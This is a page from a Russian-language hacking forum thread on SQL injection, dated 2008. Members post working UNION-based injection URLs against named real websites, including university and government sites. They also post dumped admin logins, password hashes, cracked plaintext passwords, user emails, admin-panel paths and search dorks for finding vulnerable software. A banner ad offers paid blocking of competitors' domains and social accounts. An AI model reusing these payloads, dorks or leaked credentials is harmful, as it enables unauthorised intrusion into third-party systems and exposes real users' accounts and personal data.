УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 610 из 1242

610

Опции темы

Поиск в этой теме

Опции просмотра

#6091

24.07.2008, 20:12

~~N1K70~~

Banned

Регистрация: 02.01.2008

Сообщений: 195

Провел на форуме:
523549

Репутация: 301

Отправить сообщение для N1K70 с помощью ICQ

хотел тут хекнуть сайт с марио, но нашол только маеро

Код:

http://www.mae.ro/index.php?unde=doc&id=-1+union+select+table_name+from+information_schema.tables+limit+50,1

Ps: http://www.mae.ro/admin/

#6092

24.07.2008, 23:39

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://www.bmprocess.ru/equipment/fn?id=-1+union+select+username,password+from+u39424.joooo s_users+limit+0,10/*

login:admin
password: c845e471514d11f6b87e8d409efe313e

Не брутится курва =)

#6093

25.07.2008, 11:50

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

sellhouse.com.au

user() = sel7_aGrGOLO@localhost
version() = 4.1.18
database() = agraub9-2

есть таблица мемберс с открытми паролями

count from members = 158

http://sellhouse.com.au/detail.php?property=465555542/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt (concat_ws(0x3a,id,email,password),0x71),0x71),14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55/**/from/**/members/**/limit/**/1,1/*

Последний раз редактировалось nicusor; 25.07.2008 в 14:52..

#6094

25.07.2008, 16:56

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

Код:

http://depts.washington.edu/asuwxpcl/instructors.php?id='-999999+union+select+1,concat(user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+LIMIT+1,2/*

Код:

http://www.hastings.edu/igsbase/igstemplate.cfm?SRC=DB&SRCN=&GnavID=1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,25,26,27,28,29+from+mysql.user+LIMIT+1,6/*

Код:

http://texasextension.tamu.edu/agnews/index.php?id=1+union+select+1,concat(user,password,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user+LIMIT+13,13/*

мои первые

#6095

26.07.2008, 11:42

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

http://www.paradiz.nu/news.php?id=-1+union+select+1,2,concat(login,0x3a,password,0x3a ),4+from+u57027_3.fs_admin+limit+0,10/*

login: admin
pass: maximus

http://www.paradiz.nu/admin

Зы: админка не фурычит - может обманка, или тупо не рабочая.

#6096

26.07.2008, 11:48

2la.painkiller

Новичок

Регистрация: 22.05.2008

Сообщений: 27

Провел на форуме:
80944

Репутация: 0

Цитата:

Сообщение от Xcontrol212

Код:

http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,USER(),3,4,5,6,7/*

user: renewabl_webuser
имя БД: renewabl_mhpwebsite
но чтоб узнать пасс, надо знать таблу, для этого либо брутить, либбо информационная схема (не робит, ибо старый мускул), либо вручную угадать простые названия))

kubu:freedom
http://microhydropower.net/user/login_page.php админка
но шел залить ни как не удасцо (
и админка много не даст всё идет через mysql
надеюсь на респект )

#6097

26.07.2008, 14:06

Cmucl

Новичок

Регистрация: 21.06.2008

Сообщений: 17

Провел на форуме:
153953

Репутация: 18

http://www.openworld.gov/

PR - 6

http://www.openworld.gov/news/print.php?id=215&lang=2 - Путь к уязвимому скрипту

Первых 5 записей форума

[1]:anonymous:
[2]:bbadmin:93dc6603a409188be197bde54e543056
[3]:A.Natasha:084301fc1b042b1397edb06d1a7c9125
[4]:Г‚Г®Г«ГЄГ®Гў ГЂГ«ГҐГЄГ±ГҐГ©:3d863b367aa379f71c7af c0c9cdca41d
[5]:Olga Gornovaya:a122c630d4ac882086a70604dfd43c9e

Первых 5 записей системных юзеров

[1]:vadim:046d0f41a5d82dc559978d127488f339:vadim@proj ectharmony.ru
[2]

lga:df5ee863b0a8ed6114bed2afa3440a9d

lga@projec tharmony.org
[3]:boukel:1fe1985be591afb061dee0857b6a4f47:boukel@pr ojectharmony.ru
[4]:mbuhar:e89c7fb2900fec2c35d3a056160cbe80:mbuhar@pr ojectharmony.ru
[5]:Britta:a15bb2bcc715bbd968f5bae3efae67c4:bbjo@loc. gov

#6098

26.07.2008, 18:38

~~N1K70~~

Banned

Регистрация: 02.01.2008

Сообщений: 195

Провел на форуме:
523549

Репутация: 301

Цитата:

Сообщение от Cmucl

http://www.openworld.gov/

http://www.openworld.gov/phpMyAdmin/

#6099

26.07.2008, 21:43

~~N1K70~~

Banned

Регистрация: 02.01.2008

Сообщений: 195

Провел на форуме:
523549

Репутация: 301

Код:

http://www.german-tigers.de/Quiz/phptest-0.6.3/picture.php?image_id=-1+union+select+1,concat_ws(0x3a3a,username,password)+from+users/*

Код:

admin::07428b233f457aa2

Код:

inurl:"powered by phptest 0.6.3"

Код:

http://www.et2d.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*

Код:

15aa7b432c7f74b11c332b8d60672cc4:Muhammad

Код:

inurl:"powered by Live Music Plus"

Последний раз редактировалось N1K70; 26.07.2008 в 21:53..

#6100

26.07.2008, 22:17

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

http://www.justinian.com.ua/album.php?cat=2+union+select+concat_ws(0x3a,ID,Log in,Passw),2,3,4,5,6+from+authUser/*

Админка: www.justinian.com.ua/admin

Login: ups
Password: alladin

помимо скулей и xss,есть баг с zend engine hashes,а так же раскрытие путей,имён таблиц с колонками и т.д. и т.п... Баг на баге).У кого получится залить шелл пишите xDDD.

http://www.soaw.org/pressrelease.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6,7,8,9,10,11,12,13+from+phpsp_users--

Таблицы - account, phpsp_users

http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database()),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20--

http://www.kafedra.com.ua/modules/articles/article.php?id=328+union+select+1,2,3,4,table_name ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+inf ormation_schema.tables+limit+1,1--

Table: xoops_users

Virgo-vlad:46f227e9cf17e2e1e88b14e679047bd9:252525
andron_AS:123e24289c7434008bec6b61ab8f100a:looper
Barulya:7a4ff1d33e92f1b8e33b8bbb6daf08c6:kos1981
Belle:e76d56e405d994722ac98d9966146010:ghjcnjnfr
Bolt:ba3a02ac8d369c6747c0007368b98500:fkut,hf
chirik:f6c5fe9e207a16fb771e2231a9f30851:231276
crazyman:3e0e92b5dd80c25494d58cac262193fd

Table: user

S Maxim S:4e3acf83f4228b1ca16b7579baa82156
Segoktuhf:0be8ec195a5680fc5fb23848a18e63ba
Pindukled:1a840b31bd4fdf0d7ebfd7188474e997
ruslibrary:e60d4769b08ffc474fa7e53b995b8e4d

Table: ibf_members

automart:0fd4124daf45355c946a2d040ca286e2
password: dallas22

Tolstiy:b3b4d2dbedc99fe843fd3dedb02f086f
password: 1981

chirik:f6c5fe9e207a16fb771e2231a9f30851
password: 231276
sergsava: qwert

Страница 610 из 1242

610

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)

Быстрый переход